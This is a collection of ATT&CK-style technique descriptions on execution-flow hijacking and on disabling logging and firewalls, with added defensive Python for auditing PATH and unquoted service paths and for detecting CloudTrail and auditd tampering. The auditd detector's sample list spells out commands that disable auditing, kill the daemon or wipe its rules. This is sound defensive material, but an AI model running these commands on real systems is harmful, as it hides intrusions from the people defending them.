Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.

Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the <code>%TEMP%</code> directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://app.tidalcyber.com/technique/69cd62f8-b729-4a05-8351-5bb961f7c6d6).

Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://app.tidalcyber.com/technique/5e1499a1-f1ad-4929-84e1-5d33c371c02d). Several examples of this weakness in existing common installers have been reported to software vendors.<sup>[[mozilla_sec_adv_2012](https://app.tidalcyber.com/references/cd720550-a0b5-4d1d-85dd-98da97f45b62)]</sup> <sup>[[Executable Installers are Vulnerable](https://app.tidalcyber.com/references/5c2791d4-556d-426a-b305-44e23b50f013)]</sup> If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.

The tag is: misp-galaxy:technique="Executable Installer File Permissions Weakness"

KernelCallbackTable

Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.<sup>[[Lazarus APT January 2022](https://app.tidalcyber.com/references/fbd96014-16c3-4ad6-bb3f-f92d15efce13)]</sup><sup>[[FinFisher exposed ](https://app.tidalcyber.com/references/b2f4541e-f981-4b25-abf4-1bec92b16faa)]</sup> The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.<sup>[[Windows Process Injection KernelCallbackTable](https://app.tidalcyber.com/references/01a3fc64-ff07-48f7-b0d9-5728012761c7)]</sup>

An adversary may hijack the execution flow of a process using the <code>KernelCallbackTable</code> by replacing an original callback function with a malicious payload. Modifying callback functions can be achieved in various ways involving related behaviors such as [Reflective Code Loading](https://app.tidalcyber.com/technique/ef85800b-080d-4739-9f3b-91b61314a93e) or [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e) into another process.

A pointer to the memory address of the <code>KernelCallbackTable</code> can be obtained by locating the PEB (ex: via a call to the <code>NtQueryInformationProcess()</code> [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) function).<sup>[[NtQueryInformationProcess](https://app.tidalcyber.com/references/7b533ca9-9075-408d-b125-89bc7446ec8f)]</sup> Once the pointer is located, the <code>KernelCallbackTable</code> can be duplicated, and a function in the table (e.g., <code>fnCOPYDATA</code>) set to the address of a malicious payload (ex: via <code>WriteProcessMemory()</code>). The PEB is then updated with the new address of the table. Once the tampered function is invoked, the malicious payload will be triggered.<sup>[[Lazarus APT January 2022](https://app.tidalcyber.com/references/fbd96014-16c3-4ad6-bb3f-f92d15efce13)]</sup>

The tampered function is typically invoked using a Windows message. After the process is hijacked and malicious code is executed, the <code>KernelCallbackTable</code> may also be restored to its original state by the rest of the malicious payload.<sup>[[Lazarus APT January 2022](https://app.tidalcyber.com/references/fbd96014-16c3-4ad6-bb3f-f92d15efce13)]</sup> Use of the <code>KernelCallbackTable</code> to hijack execution flow may evade detection from security products since the execution can be masked under a legitimate process.

The tag is: misp-galaxy:technique="KernelCallbackTable"

Path Interception by PATH Environment Variable

Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. The PATH environment variable contains a list of directories (User and System) that the OS searches sequentially through in search of the binary that was called from a script or the command line.

Adversaries can place a malicious program in an earlier entry in the list of directories stored in the PATH environment variable, resulting in the operating system executing the malicious binary rather than the legitimate binary when it searches sequentially through that PATH listing.

For example, on Windows, if an adversary places a malicious program named "net.exe" in the C:\example path, which by default precedes C:\Windows\system32\net.exe in the PATH environment variable, then when "net" is executed from the command line the program in C:\example will be called instead of the system’s legitimate executable at C:\Windows\system32\net.exe. Some methods of executing a program rely on the PATH environment variable to determine the locations that are searched when the path for the program is not given, such as executing programs from a Command and Scripting Interpreter.<sup>[[ExpressVPN PATH env Windows 2021](https://app.tidalcyber.com/references/26096485-1dd6-512a-a2a1-27dbbfb6fde0)]</sup>

Adversaries may also directly modify the $PATH variable specifying the directories to be searched. An adversary can modify the $PATH variable to point to a directory to which they have write access. When a program using the $PATH variable is called, the OS searches the specified directory and executes the malicious binary. On macOS, this can also be performed through modifying the $HOME variable. These variables can be modified using the command-line, launchctl, [Unix Shell Configuration Modification](https://app.tidalcyber.com/technique/cc5ae19f-981d-4004-bb74-260b8ebad73a), or modifying the /etc/paths.d folder contents.<sup>[[uptycs Fake POC linux malware 2023](https://app.tidalcyber.com/references/edc18649-2fcf-5fb3-a717-db4bb28ca25f)]</sup><sup>[[nixCraft macOS PATH variables](https://app.tidalcyber.com/references/83daecf1-8708-56da-aaad-1e7e95c4ea43)]</sup><sup>[[Elastic Rules macOS launchctl 2022](https://app.tidalcyber.com/references/04b0582e-357f-5f2a-8582-b3bf8f52c2a2)]</sup>

The tag is: misp-galaxy:technique="Path Interception by PATH Environment Variable"

Path Interception by Search Order Hijacking

Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.

Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://app.tidalcyber.com/technique/69cd62f8-b729-4a05-8351-5bb961f7c6d6), the search order differs depending on the method that is used to execute the program. <sup>[[Microsoft CreateProcess](https://app.tidalcyber.com/references/aa336e3a-464d-48ce-bebb-760b73764610)]</sup> <sup>[[Windows NT Command Shell](https://app.tidalcyber.com/references/aee1e76c-8ff2-4ff0-83e3-edcb76f34d19)]</sup> <sup>[[Microsoft WinExec](https://app.tidalcyber.com/references/9e1ae9ae-bafc-460a-891e-e75df01c96c4)]</sup> However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program’s directory.

For example, "example.exe" runs "cmd.exe" with the command-line argument <code>net user</code>. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then <code>cmd.exe /C net user</code> will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. <sup>[[Microsoft Environment Property](https://app.tidalcyber.com/references/64598969-864d-4bc7-805e-c289cccb7bc6)]</sup>

Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://app.tidalcyber.com/technique/69cd62f8-b729-4a05-8351-5bb961f7c6d6).
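The two entries above, Path Interception by PATH Environment Variable and Path Interception by Search Order Hijacking, describe the same lookup from two angles: which directories are consulted, and in what order the PATHEXT extensions are tried inside each directory. The model below is an added example (not code from the galaxy or the ATT&CK sources) that reproduces that lookup over a constructed set of files and lists every location that would be chosen over the legitimate binary, which is the list a defender baselines for write access and monitors for file creation. It uses the simplified order given in the text (initiating program's directory, then PATH entries, each tried with every PATHEXT extension); CreateProcess and cmd.exe differ in details the entries do not cover, and those differences are not modelled.

```python
"""Model how a PATH-based lookup resolves a bare command name on Windows."""
import ntpath
from typing import Callable, Iterable, Iterator, List, Optional

# Default PATHEXT order: .COM is tried before .EXE in every directory.
DEFAULT_PATHEXT = [".COM", ".EXE", ".BAT", ".CMD"]


def search_directories(initiating_dir: str, path_value: str) -> List[str]:
    """Directory of the initiating program first, then the PATH entries in order."""
    dirs = [initiating_dir]
    dirs.extend(d for d in path_value.split(";") if d)
    return dirs


def candidate_paths(command: str, search_dirs: Iterable[str],
                    pathext: List[str]) -> Iterator[str]:
    """Yield, in lookup order, every file the lookup for `command` would test:
    directory by directory and, within a directory, extension by extension.
    A command given with an explicit extension is tried as-is in each directory."""
    has_ext = ntpath.splitext(command)[1].lower() in {e.lower() for e in pathext}
    for d in search_dirs:
        if has_ext:
            yield ntpath.join(d, command)
        else:
            for ext in pathext:
                yield ntpath.join(d, command + ext)


def resolve_command(command: str, search_dirs: Iterable[str], pathext: List[str],
                    exists: Callable[[str], bool]) -> Optional[str]:
    """The first candidate that exists is the one that runs."""
    for cand in candidate_paths(command, search_dirs, pathext):
        if exists(cand):
            return cand
    return None


def shadowing_candidates(command: str, search_dirs: Iterable[str], pathext: List[str],
                         expected_path: str) -> List[str]:
    """Every path that would win over `expected_path` if a file appeared there."""
    out = []
    for cand in candidate_paths(command, search_dirs, pathext):
        if ntpath.normcase(cand) == ntpath.normcase(expected_path):
            break
        out.append(cand)
    return out


def make_exists(files: Iterable[str]) -> Callable[[str], bool]:
    """Build a case-insensitive existence predicate over a constructed file set."""
    normalized = {ntpath.normcase(p) for p in files}
    return lambda path: ntpath.normcase(path) in normalized


# Constructed sample: C:\Example stands in for the user-writable PATH entry
# from the text, and C:\Apps\Example\net.com is a planted file next to example.exe.
SAMPLE_FILES = [
    r"C:\Windows\System32\net.exe",
    r"C:\Windows\System32\cmd.exe",
    r"C:\Apps\Example\example.exe",
    r"C:\Apps\Example\net.com",
]
SAMPLE_PATH = r"C:\Example;C:\Windows\System32;C:\Windows"
SAMPLE_DIRS = search_directories(r"C:\Apps\Example", SAMPLE_PATH)
EXPECTED_NET = r"C:\Windows\System32\net.exe"
sample_exists = make_exists(SAMPLE_FILES)

if __name__ == "__main__":
    print("net resolves to:", resolve_command("net", SAMPLE_DIRS, DEFAULT_PATHEXT, sample_exists))
    print("paths that would shadow the system net.exe:")
    for p in shadowing_candidates("net", SAMPLE_DIRS, DEFAULT_PATHEXT, EXPECTED_NET):
        print("  ", p)
```

Two things the output makes concrete: the planted <code>net.com</code> wins even though <code>net.exe</code> exists in the same directory, because of extension order, and one of the shadowing locations (<code>C:\Windows\System32\net.com</code>) is inside the system directory itself, so the audit has to cover privileged directories as well as user-writable ones. Fully qualifying the path in the calling program removes the whole candidate list.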

The tag is: misp-galaxy:technique="Path Interception by Search Order Hijacking"

Path Interception by Unquoted Path

Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary’s executable to launch.

Service paths (stored in Windows Registry keys)<sup>[[Microsoft CurrentControlSet Services](https://app.tidalcyber.com/references/cb9b5391-773f-4b56-8c41-d4f548c7b835)]</sup> and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., <code>C:\unsafe path with space\program.exe</code> vs. <code>"C:\safe path with space\program.exe"</code>).<sup>[[Help eliminate unquoted path](https://app.tidalcyber.com/references/23ad5a8c-cbe1-4f40-8757-f1784a4003a1)]</sup> An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is <code>C:\program files\myapp.exe</code>, an adversary may create a program at <code>C:\program.exe</code> that will be run instead of the intended program.<sup>[[Windows Unquoted Services](https://app.tidalcyber.com/references/30681a0a-a49f-416a-b5bc-621c60f1130a)]</sup> <sup>[[Windows Privilege Escalation Guide](https://app.tidalcyber.com/references/185154f2-5f2e-48bf-b609-991e9d6a037b)]</sup>

This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.
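An audit of service <code>ImagePath</code> values for the weakness described above, added as an example that is not part of the galaxy entry or its references. Given the values as exported from <code>HKLM\SYSTEM\CurrentControlSet\Services\&lt;name&gt;</code>, it works out which space-delimited prefixes Windows would try before the intended binary (the <code>C:\program.exe</code> case from the text, generalised to any number of spaces), and produces the quoted value that closes the gap. The heuristic of taking the shortest prefix ending in an executable extension as the intended binary is this example's own; the sample service names and paths are constructed.

```python
"""Audit service ImagePath values for unquoted paths that contain spaces."""
import ntpath
from typing import Dict, List, Optional, Tuple

EXEC_EXTS = (".exe", ".com", ".bat", ".cmd")


def split_unquoted_image_path(image_path: str) -> Optional[Tuple[str, str]]:
    """Return (executable, arguments) for an unquoted ImagePath, taking the
    shortest space-delimited prefix that ends in an executable extension as the
    intended binary. None if no such prefix exists (e.g. a driver .sys path)."""
    tokens = image_path.strip().split(" ")
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(EXEC_EXTS):
            return prefix, " ".join(tokens[i:])
    return None


def interception_candidates(image_path: str) -> List[str]:
    """Paths Windows would try before the intended executable when the value is
    unquoted: each shorter space-delimited prefix, with .exe appended when the
    prefix has no extension. Empty for quoted or space-free paths."""
    value = image_path.strip()
    if value.startswith('"'):
        return []
    parsed = split_unquoted_image_path(value)
    if parsed is None:
        return []
    tokens = parsed[0].split(" ")
    candidates = []
    for i in range(1, len(tokens)):
        prefix = " ".join(tokens[:i])
        candidates.append(prefix if ntpath.splitext(prefix)[1] else prefix + ".exe")
    return candidates


def quoted_image_path(image_path: str) -> str:
    """The remediated value: executable wrapped in quotes, arguments untouched."""
    value = image_path.strip()
    parsed = None if value.startswith('"') else split_unquoted_image_path(value)
    if parsed is None:
        return value
    exe, args = parsed
    return f'"{exe}" {args}'.rstrip()


def audit_services(image_paths: Dict[str, str]) -> List[dict]:
    """One finding per service whose ImagePath admits interception."""
    findings = []
    for name, path in image_paths.items():
        cands = interception_candidates(path)
        if cands:
            findings.append({"service": name, "image_path": path,
                             "intercept_paths": cands, "fix": quoted_image_path(path)})
    return findings


# Constructed sample: ImagePath values as exported from the Services key.
SAMPLE_IMAGE_PATHS = {
    "SafeSvc": r'"C:\safe path with space\program.exe" -k svc',
    "UnsafeSvc": r"C:\unsafe path with space\program.exe -k svc",
    "MyApp": r"C:\program files\myapp.exe",
    "Schedule": r"%SystemRoot%\system32\svchost.exe -k netsvcs",
    "SomeDriver": r"\SystemRoot\System32\drivers\example.sys",
}

if __name__ == "__main__":
    for f in audit_services(SAMPLE_IMAGE_PATHS):
        print(f"{f['service']}: {f['image_path']}")
        for p in f["intercept_paths"]:
            print("   would be tried first:", p)
        print("   fix:", f["fix"])
```

The candidate list doubles as a detection aid: a file appearing at one of those paths (for instance <code>C:\program.exe</code>) on a host where the unquoted service exists is worth an alert, and the quoted value is the change to push through the service controller.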

The tag is: misp-galaxy:technique="Path Interception by Unquoted Path"

Services File Permissions Weakness

Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.

Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.

The tag is: misp-galaxy:technique="Services File Permissions Weakness"

Services Registry Permissions Weakness

Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service’s Registry keys can be manipulated to modify a service’s execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde), or [Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532). Access to Registry keys is controlled through access control lists and user permissions. <sup>[[Registry Key Security](https://app.tidalcyber.com/references/f8f12cbb-029c-48b1-87ce-624a7f98c8ab)]</sup><sup>[[malware_hides_service](https://app.tidalcyber.com/references/c5982f65-1782-452a-9667-a8732d31e89a)]</sup>

If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service’s binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).

Adversaries may also alter other Registry keys in the service’s Registry tree. For example, the <code>FailureCommand</code> key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.<sup>[[Kansa Service related collectors](https://app.tidalcyber.com/references/d854f84a-4d70-4ef4-9197-d8f5396feabb)]</sup><sup>[[Tweet Registry Perms Weakness](https://app.tidalcyber.com/references/7757776d-b0e9-4a99-8a55-2cd1b248c4a0)]</sup>

The <code>Performance</code> key contains the name of a driver service’s performance DLL and the names of several exported functions in the DLL.<sup>[[microsoft_services_registry_tree](https://app.tidalcyber.com/references/171cfdf1-d91c-4df3-831e-89b6237e3c8b)]</sup> If the <code>Performance</code> key is not already present and if an adversary-controlled user has the <code>Create Subkey</code> permission, adversaries may create the <code>Performance</code> key in the service’s Registry tree to point to a malicious DLL.<sup>[[insecure_reg_perms](https://app.tidalcyber.com/references/d18717ae-7fe4-40f9-aff2-b35120d31dc8)]</sup>

Adversaries may also add the <code>Parameters</code> key, which stores driver-specific data, or other custom subkeys for their malicious services to establish persistence or enable other malicious activities.<sup>[[microsoft_services_registry_tree](https://app.tidalcyber.com/references/171cfdf1-d91c-4df3-831e-89b6237e3c8b)]</sup><sup>[[troj_zegost](https://app.tidalcyber.com/references/c3790ad6-704a-4076-8729-61b5df9d7983)]</sup> Additionally, If adversaries launch their malicious services using svchost.exe, the service’s file may be identified using <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\servicename\Parameters\ServiceDll</code>.<sup>[[malware_hides_service](https://app.tidalcyber.com/references/c5982f65-1782-452a-9667-a8732d31e89a)]</sup>

The tag is: misp-galaxy:technique="Services Registry Permissions Weakness"

Hijack Execution Flow

Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.

There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.

The tag is: misp-galaxy:technique="Hijack Execution Flow"

Disable or Modify Cloud Firewall

Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://app.tidalcyber.com/technique/4f7d0afb-92ce-429b-9ef5-dc6a7fc4f4a8).

Cloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity, or remove networking limitations to support traffic associated with malicious activity (such as cryptomining).<sup>[[Expel IO Evil in AWS](https://app.tidalcyber.com/references/4c2424d6-670b-4db0-a752-868b4c954e29)]</sup><sup>[[Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022](https://app.tidalcyber.com/references/af755ba2-97c2-5152-ab00-2e24740f69f3)]</sup>

Modifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.

The tag is: misp-galaxy:technique="Disable or Modify Cloud Firewall"

Disable or Modify Cloud Logs

An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.

For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.<sup>[[Following the CloudTrail: Generating strong AWS security signals with Sumo Logic](https://app.tidalcyber.com/references/96560211-59b3-4eae-b8a3-2f988f6fdca3)]</sup> They may alternatively tamper with logging functionality – for example, by removing any associated SNS topics, disabling multi-region logging, or disabling settings that validate and/or encrypt log files.<sup>[[AWS Update Trail](https://app.tidalcyber.com/references/a94e1e4a-2963-5563-a8a6-ab9f64a86476)]</sup><sup>[[Pacu Detection Disruption Module](https://app.tidalcyber.com/references/deba605b-7abc-5794-a820-448a395aab69)]</sup> In Office 365, an adversary may disable logging on mail collection activities for specific users by using the Set-MailboxAuditBypassAssociation cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the user’s license from an Enterprise E5 to an Enterprise E3 license.<sup>[[Dark Reading Microsoft 365 Attacks 2021](https://app.tidalcyber.com/references/f26d3aa4-6966-53c4-b9d1-848420377eae)]</sup>
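Detection logic for the AWS half of the paragraph above, added as an example that is not part of the galaxy entry or its references. It runs over CloudTrail records (the <code>{"Records": [...]}</code> shape of a delivered log file) and flags calls that stop or delete a trail, change its event selectors, or weaken it through UpdateTrail: multi-region logging turned off, log file validation turned off, or the KMS key, SNS topic or CloudWatch Logs integration cleared. The parameter names follow the UpdateTrail request syntax; treating an empty string in the integration fields as "cleared" is this example's interpretation. The account id, ARNs, addresses and trail name in the sample are constructed.

```python
"""Detect CloudTrail API calls that disable or weaken trail logging."""
import json
from typing import List, Optional

# Calls that by themselves reduce what CloudTrail records.
DIRECT_TAMPER = {
    "StopLogging": "logging stopped for the trail",
    "DeleteTrail": "trail deleted",
    "PutEventSelectors": "event selectors changed (may drop management or data events)",
}
# UpdateTrail parameters whose listed value removes a protection.
WEAKENING_PARAMS = {
    "isMultiRegionTrail": (False, "multi-region logging disabled"),
    "enableLogFileValidation": (False, "log file validation disabled"),
    "includeGlobalServiceEvents": (False, "global service events excluded"),
}
# UpdateTrail parameters where an empty string is read here as clearing an integration.
CLEARABLE_PARAMS = {
    "kmsKeyId": "log file encryption key removed",
    "snsTopicName": "SNS notification topic removed",
    "cloudWatchLogsLogGroupArn": "CloudWatch Logs delivery removed",
}


def analyze_record(rec: dict) -> Optional[dict]:
    """Return a finding for one CloudTrail record, or None if it is benign."""
    if rec.get("eventSource") != "cloudtrail.amazonaws.com":
        return None
    name = rec.get("eventName")
    params = rec.get("requestParameters") or {}
    reasons = []
    if name in DIRECT_TAMPER:
        reasons.append(DIRECT_TAMPER[name])
    elif name == "UpdateTrail":
        for key, (bad_value, msg) in WEAKENING_PARAMS.items():
            if key in params and params[key] == bad_value:
                reasons.append(msg)
        for key, msg in CLEARABLE_PARAMS.items():
            if key in params and params[key] == "":
                reasons.append(msg)
    if not reasons:
        return None
    return {
        "eventTime": rec.get("eventTime"),
        "eventName": name,
        "trail": params.get("name"),
        "actor": (rec.get("userIdentity") or {}).get("arn"),
        "sourceIP": rec.get("sourceIPAddress"),
        "reasons": reasons,
    }


def analyze_log(text: str) -> List[dict]:
    """Run the detection over a CloudTrail log file body ({"Records": [...]})."""
    records = json.loads(text).get("Records", [])
    return [f for f in map(analyze_record, records) if f]


# Constructed sample log: one read-only call, a StopLogging, a weakening
# UpdateTrail, and a benign UpdateTrail that adds a KMS key.
SAMPLE_LOG = json.dumps({"Records": [
    {"eventTime": "2024-01-15T10:01:00Z", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "DescribeTrails", "sourceIPAddress": "198.51.100.10",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/analyst"},
     "requestParameters": None},
    {"eventTime": "2024-01-15T10:02:13Z", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "StopLogging", "sourceIPAddress": "203.0.113.7",
     "userIdentity": {"arn": "arn:aws:sts::123456789012:assumed-role/deploy/i-0abc"},
     "requestParameters": {"name": "org-trail"}},
    {"eventTime": "2024-01-15T10:02:40Z", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "UpdateTrail", "sourceIPAddress": "203.0.113.7",
     "userIdentity": {"arn": "arn:aws:sts::123456789012:assumed-role/deploy/i-0abc"},
     "requestParameters": {"name": "org-trail", "isMultiRegionTrail": False,
                           "enableLogFileValidation": False}},
    {"eventTime": "2024-01-15T11:30:00Z", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "UpdateTrail", "sourceIPAddress": "198.51.100.10",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/analyst"},
     "requestParameters": {"name": "org-trail",
                           "kmsKeyId": "arn:aws:kms:us-east-1:123456789012:key/constructed"}},
]})

if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f"{f['eventTime']} {f['eventName']} on {f['trail']} by {f['actor']} "
              f"from {f['sourceIP']}: {'; '.join(f['reasons'])}")
```

Because these events are themselves recorded by CloudTrail, the rule only works if it consumes a trail the actor cannot silence: an organization trail delivered to a separate, write-protected account is the usual answer, and the same events can be wired to a real-time notification so that a StopLogging is seen before the gap it creates.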

The tag is: misp-galaxy:technique="Disable or Modify Cloud Logs"

Disable or Modify Linux Audit System

Adversaries may disable or modify the Linux audit system to hide malicious activity and avoid detection. Linux admins use the Linux Audit system to track security-relevant information on a system. The Linux Audit system operates at the kernel level and maintains event logs on application and system activity such as process, network, file, and login events based on pre-configured rules.

The system is often referred to as auditd, the name of the daemon that writes events to disk; the daemon is governed by the parameters set in the audit.conf configuration file. The two primary ways to configure the log generation rules are the command-line auditctl utility and the file /etc/audit/audit.rules, which contains a sequence of auditctl commands loaded at boot time.<sup>[[Red Hat System Auditing](https://app.tidalcyber.com/references/599337b3-8587-5578-9be5-e6e4f0edd0ef)]</sup><sup>[[IzyKnows auditd threat detection 2022](https://app.tidalcyber.com/references/8a2f5c37-df28-587e-81b8-4bf7bb796854)]</sup>

With root privileges, adversaries may be able to ensure their activity is not logged by disabling the Audit system service, editing the configuration/rule files, or hooking the Audit system library functions. Using the command line, adversaries can disable the Audit system service by killing processes associated with the auditd daemon or by using systemctl to stop the Audit service. Adversaries can also hook Audit system functions to disable logging or modify the rules contained in the /etc/audit/audit.rules or audit.conf files to ignore malicious activity.<sup>[[Trustwave Honeypot SkidMap 2023](https://app.tidalcyber.com/references/300505ae-bb7a-503d-84c5-9ff021eb6f3a)]</sup><sup>[[ESET Ebury Feb 2014](https://app.tidalcyber.com/references/eb6d4f77-ac63-4cb8-8487-20f9e709334b)]</sup>
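A classifier for the command-line variants described above (disabling through auditctl, stopping the service, killing the daemon, rewriting the files under <code>/etc/audit/</code>), added as an example that is not part of the galaxy entry or its references. It is meant to run over recorded command lines from shell history or an EDR process feed; the read-only viewer list and the sample command lines are constructed. A bare <code>kill &lt;pid&gt;</code> cannot be classified without knowing which process the pid belonged to, so it is deliberately left alone.

```python
"""Flag process command lines that disable or reconfigure the Linux audit system."""
import os
import shlex
from typing import List, Optional, Tuple

AUDIT_CONFIG_PREFIX = "/etc/audit/"   # audit.rules, rules.d/, daemon configuration
# Programs that only read a file; touching audit config with these is not tampering
# (constructed list).
READ_ONLY_PROGRAMS = {"cat", "less", "more", "grep", "head", "tail", "stat", "ls", "diff"}


def classify_command(cmdline: str) -> Optional[str]:
    """Return a short reason if `cmdline` tampers with auditing, else None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:          # unbalanced quotes: not parseable, not classified
        return None
    if not argv:
        return None
    prog, args = os.path.basename(argv[0]), argv[1:]

    if prog == "auditctl":
        if "-D" in args:
            return "auditctl -D: all loaded audit rules deleted"
        for i, arg in enumerate(args):
            if arg == "-e" and i + 1 < len(args) and args[i + 1] == "0":
                return "auditctl -e 0: audit system disabled"
        return None                 # -e 1 / -e 2 (immutable) and -l are fine

    if prog in ("systemctl", "service"):
        if "auditd" in args and any(verb in args for verb in ("stop", "disable", "mask")):
            return f"{prog}: auditd service stopped or disabled"
        return None

    if prog in ("pkill", "killall") and "auditd" in args:
        return f"{prog}: auditd process killed"

    if prog in READ_ONLY_PROGRAMS:
        return None
    # Editors, sed, rm, shell redirection and the like that name the config tree.
    for arg in args:
        if arg.startswith(AUDIT_CONFIG_PREFIX):
            return f"{prog}: audit configuration {arg} modified"
    return None


def scan_commands(cmdlines: List[str]) -> List[Tuple[str, str]]:
    """Return (command line, reason) for every command that tampers with auditing."""
    hits = []
    for line in cmdlines:
        reason = classify_command(line)
        if reason:
            hits.append((line, reason))
    return hits


# Constructed sample of command lines as recovered from a root shell history.
SAMPLE_COMMANDS = [
    "auditctl -l",
    "auditctl -e 0",
    "systemctl stop auditd",
    "service auditd restart",
    "pkill -9 auditd",
    "cat /etc/audit/audit.rules",
    "sed -i '/execve/d' /etc/audit/rules.d/audit.rules",
    "echo '' > /etc/audit/audit.rules",
    "auditctl -e 2",
    "kill -9 4242",
]

if __name__ == "__main__":
    for line, reason in scan_commands(SAMPLE_COMMANDS):
        print(f"{reason:55} <- {line}")
```

Setting the audit system immutable (<code>auditctl -e 2</code>) is the mitigation counterpart of the first rule: once set, rule changes and disabling require a reboot, which turns a silent reconfiguration into an event that is hard to miss.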

The tag is: misp-galaxy:technique="Disable or Modify Linux Audit System"

Disable or Modify System Firewall

Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.

